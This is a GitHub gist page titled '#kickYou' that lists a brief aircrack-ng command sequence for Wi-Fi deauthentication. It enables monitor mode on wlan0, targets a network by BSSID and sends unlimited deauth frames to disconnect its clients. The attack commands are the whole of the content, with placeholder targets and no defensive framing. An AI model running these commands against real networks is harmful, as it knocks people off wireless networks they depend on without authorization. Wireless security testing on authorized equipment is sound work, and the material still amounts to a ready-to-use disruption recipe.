Skip to content

Instantly share code, notes, and snippets.

@DastanIqbal
Created August 26, 2019 09:17
Show Gist options
  • Save DastanIqbal/11677a16a3e61261050fac98fd69592c to your computer and use it in GitHub Desktop.
Save DastanIqbal/11677a16a3e61261050fac98fd69592c to your computer and use it in GitHub Desktop.
#kickYou
airmon-ng check kill
airmon-ng start wlan0
airodump-ng --bssid <bssid> wlan0
aireplay-ng --deauth 0 -a (networks bssid) -k (ip address)
aireplay-ng --deauth 0 -a (networks bssid) -c (mac address)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment